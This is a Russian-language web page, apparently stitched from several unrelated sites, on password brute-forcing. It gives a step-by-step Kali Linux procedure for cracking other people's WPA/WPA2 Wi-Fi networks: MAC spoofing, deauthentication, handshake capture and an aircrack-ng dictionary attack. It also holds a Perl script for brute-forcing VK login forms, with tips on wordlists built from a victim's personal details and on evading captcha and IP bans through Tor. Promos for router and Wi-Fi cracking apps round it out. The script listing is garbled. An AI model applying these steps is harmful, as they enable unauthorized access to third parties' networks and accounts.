🔫 Обзор инструментов брутфорса для тестирования на проникновение

Взлом Wifi c помощью перебора паролей – немного теории

Сегодня мы рассмотрим, как взломать Wi Fi средством подбора паролей с помощью Kali Linux.

Статья на свежий релиз Kali Linux.

Brute force – Атака грубой силы, то есть атака методом подбора паролей направленная на различные сервисы. Как правило, люди ставят простые пароли на свои учетные записи социальных сетей, админки от сайтов и Wi Fi сети, взломать такие пароли не составит труда и не займет много времени.

Для взлома с помощью brute force потребуется:

  • Wordlist – словарь, который содержит в себе множество различных комбинации символов, паролей.
  • Kali Linux

Wordlist можно скачать по ссылке, также вы можете найти различные словари, украденные пароли и статистику на SkullSecurity.

Airmon-ng – набор программ, предназначенных для обнаружения беспроводных сетей, перехвата передаваемого через беспроводные сети трафика, аудита WEP и WPA/WPA2-PSK ключей шифрования (проверка стойкости), в том числе пентеста (Penetration test) беспроводных сетей.

А вот и подробное руководство по взлому Wi-Fi сетей.

Взлом Wifi | Brute force WPA/WPA2 – этапы и практика

Смена Mac-адреса:

Если мы не сменим Mac-адрес, то нас могут найти и заблокировать, так что этот пункт хоть и не обязателен, но очень рекомендуется.

Для начала нам нужно опустить нашу сетевую карту:

ifconfig wlan0 down

Далее запускаем macchanger с флагом -r, чтобы сгенерировать рандомный mac-адрес.

macchanger -r wlan0

Поднимает нашу сетевую карту:

ifconfig wlan0 up

Далее нам потребуется перевести нашу сетевую карту в режим мониторинга сетей, делать мы это будем с помощью airmon-ng, как и все дальнейшие действия:

airmon-ng airmon-ng start wlan0

image

Нам потребуется посмотреть, какие сети доступны в нашем радиусе, для этого выполняем мониторинг с помощью команды:

airodump-ng wlan0mon

image

После чего мы увидим список сетей и их свойства.

Выбираем сеть, которую собрались атаковать и далее нам потребуется словить handshake(рукопожатие).

Для этого нам потребуется ввести соответствующую команду:

airodump-ng -c (свойство CH) –bssid (свойство BSSID) -w (путь для сохранения данных) wlan0mon

Для того, чтобы словить handshake нам потребуется отправить пакеты и для этого нам нужно открыть второе окно терминала. Отправка пакетов совершается с помощью команды:

aireplay-ng 0 0 -a (свойство BSSID) wlan0mon

Почти всё готово, осталось только запустить brute force и подобрать пароль к атакуемой сети.

Запускаем команду:

aircrack-ng -w (путь к Wordlist) (.cap файл, который у нас появился)

Если вы все сделали правильно, ключ WiFi будет подобран, однако не спешите, эта процедура может быть довольно долгой. На скорость подбора паролей влияет то, на сколько мощный у вас процессор.

Я не призываю никого к противозаконным действиям, статья написана в образовательных целях.

Взлом wi fi сетей не так и сложен, как может показаться с первого раза, однако очень важно, чтобы сетевой адаптер был способен ловить handshak-и. Не каждая сетевая карта на это способна, так что для большей вероятности успеха взлома wi fi лучше использовать сетевой адаптер Alpha.

Подписывайтесь на обновления сайта, а также на наш Telegram.

Dimaska, 23 июня 2016, 13:15

Android 2.1+   Другие версии

Router Brute force — Подбираем пароли к маршрутизаторам.

ЛучшийTelegram-каналпро технологии(возможно)

Программа для подбора паролей к админке раутеров с базовой аутентификацией(Base64).

Выкладываю бесплатную версию с рекламой.

Программа автоматически вытаскивает default gateway и генерирует url для атаки, так что вам не придется копаться в настройках телефона для того что бы добыть нужную информацию.

Программа умеет работать с файлами: файл в корневой папке мобильника dict_rbf.txt -> сюда добавляем словари для подбора паролей.

В этом файле уже есть 398 пароля к разным раутерам(по умолчанию).

Так же можно в ручную вбить несколько паролей разделенных через запятую.

Для чего она вообще нужна?

Скажем у вас есть доступ к открытой беспроводной сети, но вы хотите открыть какой нибудь порт или изменить какие нибудь настройки.

Для этого вам понадобиться зайти в админку которая закрыта паролем, тут эта программа к вам и придет на помощь!

Лучше всего использовать программу при хорошем сигнале а так же желательно не преувеличивать с файлом максимум 5MB, а то все будет работать очень медленно.

Тестировал на нескольких раутерах, но возможно что то упустил.

По этому отписываетесь!

Обратите внимание что логин чувствителен к регистру на разных раутерах, по умолчанию стоит админ с маленькой буквы

ЛучшийTelegram-каналпро технологии(возможно) Последнее изменение: 23 июня 2016, 13:15 —>

Брутфорс – грубая сила, взлом перебором В статье «Взлом ВК» было сказано, что взломать вк брутфорсом (программой) – невозможно. Это не совсем так, лазейки всё таки-есть… Ниже будет приведен рабочий скрипт, но сначала…

Внизу статьи — бесплатная прога для генерирования брут словаря и листинг «топ лоховских паролей»

Заранее делаю оговорку, что речь идет о классическом «переборе» без всяких алгоритмов PBKDF2, без разбора хэширования sha , т.к. на бытовом уровне это неподъемная задача.

В сети гуляют множество программ «для взлома ВК перебором (брутом)»

Каждый аккаунт ВК требует персонального подхода и шаблонные проги из сети -это всё лажа, развод, фуфло.

Сейчас сами поймете почему. Мат.часть кратко.

Минимальная длина пароля ВК – 6 символов.

Пароль обязательно должен содержать: цифры (0-9 – 10 вариантов),  буквы (a-z – 26 в латинице),  заглавные буквы (A-Z – тоже 26)

Подсчитаем. Для этого откроем командную строку (Пуск – стандартные-Командная строка  или запустим процесс cmd.exe) Вбиваем команду ping vk.com, получаем ответ сервера

«Ответ от …..время  134мс» (это у меня, у вас время может отличаться)

Время пинга – это время за которое сигнал идет от нашей машины до сервака и обратно

Сколько же времени займет перебор паролей для ВК?

Напомню, что мы перебираем  221 918 520 426 688 (222 триллиона) вариантов пароля.

Поэтому, чтоб узнать сколько мы будем взламывать пароль ВК перебором  делим количество на скорость, т.е. 

221918520426688 пароля / 7,4 пароля в секунду = 29737081737176сек = 495618028953 мин = 8260300483 часов = 344179187 дней = 942957 лет

Вывод:реальная программа для взлома ВК могла бы подобрать пароль перебором за 94 тысячи лет.

Можно значительно ускорить процесс перебора! Для этого нужно: 1. Повысить вычислительную мощность. Например, заразить 1.000.000 чужих компов и со всех одновременно брутить ВК (аж смешно) 2. Укоротить брут-словарь до, например, пары тыщ.(по принципу социальной инженерии)

Как сделать брут-словарь? 1. Ручками в программе блокнот  (notepad.exe) 2. Прогой «генератор брута» (ссылка внизу статьи)

Этот брут – словарь наполняем реальными вариантами.

Реальные  – это такие, которые хоть как-то связано с взламываемым человеком:

телефоны (его, его родственников, друзей)Пример — номера с +7с,  8кой, без 8ки – попадается редко

даты рождения (его, его родственников, близких)Пример — (одной и той же даты) 010118, 01012018, 20180101, 180101 – попадается часто

Имена любимых, близкихПример — SashaMaria, MariaIvanova, SaNoMaIv – попадается средне

Название сайта (или фамилия) на другой раскладкеПример, если набрать слово «vkontakte» на русской раскладке, то получится – «млщтефлеу» — такая схема ну очень часто попадается на всех сайтах.

лоховской список паролей для брута (список самых распространенных паролей в сети — ссылка в конце статьи)

Долго ли писать словарь? Ну, не очень – полчаса за глаза хватит. А кто сказал что будет легко?))

Допустим у нас есть созданный брут словарь и рабочая прога для подбора пароля ВК (либо ручной ввод по словарю).

Возникает одна важная проблема – система защиты сервера.

Собственно помеха её заключается в том, что при слишком частых запросах сервер тупо блокирует (временно) ваш IP. Кроме того, если вы работаете с ВК через стандартную форму ввода (HTMLFORM), то после 3 ей неудачной попытки ВК будет просить ввести капчу.

В старой версии ВК можно было просто перейти на мобильную версию – m.vk.com, теперь же мобильной версии как таковой нет – в 2016 году сделали единый адаптивный дизайн.

Как обойти капчу Вконтакте?

ВК требует ввод капчи после 3 неудачной попытки (перезагрузка F5 не помогает), а как он узнает что это именно вы делаете несколько попыток входа?

Значит, нам не реже чем через 3 запроса нужно менять IP и чистить куки.

С куками, кэшем и JavaScript нет проблем – их можно просто отключить в настройках браузера. 

IP можно менять установив прогу по смене IP – в этом нет ничего мудреного, в сети их полно (Гугл в помощь)

Можно пользоваться браузером  TOR (кто не знает – это браузер для анонимного гуляния по сети, он же меняет IP-шники при каждой новой сессии, полезная штука особенно для тех кто сёрфит или работает в САР)

Но почти полностью сводит на нет все попытки перебора ГЕОлокация.

Сервер ВК запоминает откуда (географически) был произведен последний вход.

И если ваш IP из другого населенного пункта, то (возможно) будет выскакивать надпись:

«Вы пытаетесь зайти под именем  Ивана Иванова из необычного места.»

Чтобы подтвердить, что Вы действительно являетесь владельцем страницы, пожалуйста, укажите все недостающие цифры номера телефона, к которому привязана страница.

Скрипт для брута web-форм (типа, Прога для взлома ВК)

Важно! На сервере ВК стоит скрипт отслеживающий частоту отправки пакетов, т.е. если вы будете долбить со скоростью N раз/сек – вас автоматически отправят в бан лист по IP. Также ВК использует ГЕОслежение.

Скрипт работает методом  POST только по двум параметрам – login и пароль

Если логин известен (например, номер телефона), то соответствующие поля просто заполните значением без обращения к словарю.

Скрытые поля – капчу, картинки скрипт не передаст, скрывайте источник запросов (себя) как описано выше.

Тут нам пригодится вменяемый брут-словарь, который мы составляли в начале статьи. (назовем его, к примеру, brut.txt)

Также нужен файл, из которого наша программа будет получать информацию.

Программа будет вести брутфорс всех скриптов указанных в этом файле.(infa.txt). Если скрипт один, то можно заменить 

Естественно, файл для записи результатов (result.txt)

Итак,{ #подключаем объект $usagent = LWP::UserAgent  #открываем файл с информацией (если не можем его открыть то выходим); # скидываем файл в массив @infa и закрываем. (если скрипт один, то его можно  сразу указать) open(INFA, "; close(INFA); #открываем брут-словарь open(BRUT, "; close(BRUT); #открытие файла с результатами (дописывает в конец).  open(RESULT, ">>$ARGV[2]"); #начало цикла  foreach $name (@infa)  { #отделяем URL, login, переменные и инфу об ошибках ($url, $login, $log_vr, $pwd_vr, $failed) = split(//, $name); #показываем URL print "$url...n";  #запуск ещё одного цикла  foreach $brut (@brut)  { #убиваем пробелы и переводы строк $pss =~ s/ //; $pss =~ s/n//; #подключаем новый объект $usagent = LWP::UserAgent->new(); #создание запросов.  $req = HTTP::Request->new(POST=>$url); $req->content_type('application/x-www-form-urlencoded'); $req->content("$log_vr=$login&$pwd_vr=$pss"); #и егоотправка $result = $usagent -> request($req); #запись результатов в переменную $res = $result->content; #если не получилось формируется сообщение об ошибке if($res!~ /$failed/i) { #вывод сообщения с паролем; запись в результы; print "brutword found. It isn$pssnn"; print RESULT "URL: $urlnLOGIN: $loginnBRUT: $pssnn"; #иначе продолжение подбора last; } } } #закрытие файла result.txt close(RESULT);

Обещанные ссылки. Нажми для скачивания.

Брут словарь (топ лоховских паролей) (1.83 Kb)

Прога «Генератор брута» (для создания своего брут словаря) (690 Kb)

—>

Есть вопросы? Вы можете задать их на ФОРУМЕ.

WIBR+ WiFi Bruteforce Hack представляет собой бесплатную программу для Android-устройств, подбирающую пароли к Wi-Fi сетям. Использует как встроенные, так и дополнительно созданные и загруженные словари разной сложности, имеет опцию быстрого поиска и может работать одновременно с несколькими подключениями.

Скачать WIBR+ на Андроид на русском языке полную версию можно абсолютно бесплатно с официального сайта разработчика и напрямую по ссылкам ниже.

WIBR+ подвергнет проверке безопасность Wi-Fi и окажет пользователям помощь в получении правильной комбинации знаков к подключению. Генерирует WEP, WPA, WPA2 ключи к любым Wi-Fi точкам, не требуя от владельца Root-прав на устройстве.

Скачать WIBR WiFi Bruteforce Hack можно на компьютер, а также на Андроид устройства прямым APK файлом.

Основные возможности WIBR+

Программа позволит владельцам Android-гаджетов:

  • подбирать ключи к точкам доступа;
  • взламывать желаемые Wi-Fi сети;
  • тестировать собственное подключение;
  • выбирать из разных режимов работы;
  • устанавливать дополнительные опции;
  • работать с несколькими потоками передачи.

Приложение имеет минималистический интерфейс, без графических излишеств. Меню в WIBR+ представлено строками состояния для каждой обрабатываемой сети. После клика по любой из них открываются подробные сведения о процессе: уровне сигнала, количестве опробованных паролей, расчетном времени и т.д.

Кроме обычного автоматического подбора с помощью словаря предусмотрен режим брутфорса. Зная начало кода, например, «Андроид» и то, что в конце две цифры, ставиться маска Андроид[x] [x] и выбирается подходящий алфавит. Приложение попробует все возможные пароли согласно заданному условию: «Андроид00», «Андроид01» и до «Андроид99».

Предусмотрена кнопка паузы, поэтому пользователь в любой момент может остановить процесс. При благоприятном развитии ситуации в конечном итоге приложение отображает искомый ключ.

Особенности работы с WIBR+:

  1. Позволяет создавать собственные, применимые к конкретному случаю, словари.
  2. Имеет несколько режимов работы, отличающихся сроками возможного подбора.
  3. Предлагает параллельный взлом нескольких точек доступа одновременно.

Хотя программа и предназначена в первую очередь для поиска доступных сетей со слабыми паролями, она способна вычислить любой код, при условии наличия в словаре. Время подбора будет зависеть от его сложности и присутствия символов, отличных от цифр. Приблизительная скорость работы равна 8 кодов в минуту из-за особенностей самой Android.

Использовать данную программу рекомендуется при отключенном интернете, предварительно деактивировав штатный антивирус.

Скачать WIBR+ 2,2 МбСкачать с Play МаркетКак установить APK

  • Версия: 3.0.23 от 02.10.2019
  • Русский язык: имеется
  • Разработчик: auradesign
  • Совместимость: Android4.1+
  • Категория: Интернет
  • Подписаться: ВК и Twitter

Главная » КомментарииВам так же понравиться: WIBR+ (ver. 2.5)

WIBR+ брутфорс приложения для вскрытия закрытых сетей, позволяет подобрать пароль путем перебора вариантов из словаря. Несколько словарей уже есть в комплекте, хороший вариант для слабо защищенных сетей.

THC-Hydra (ver. 9.2)

Консольный брутфорс с множеством поддерживаемых протоколов. Самая быстрая и надежная программа такого рода с понятным синтаксисом работы.

WiFi unlocker (ver. 3.3.1)

Установив WiFi unlocker на свой смартфон ∕ планшет, вы несомненно обеспечите безопасный вход, надежную проверку своей (и при необходимости «соседских») сетей и их разблокировку

Wifislax (ver. 2.4 (64bit), 4.12 (32 bit))

Wifislax — мощный профессиональный инструмент для аудита безопасности беспроводных сетей, используется специалистами по безопасности но так же любим и хакерам так как может помочь во взломе WiFi сетей

Оцените статью
Рейтинг автора
5
Материал подготовил
Илья Коршунов
Наш эксперт
Написано статей
134
Citilink-kabinet.ru
Добавить комментарий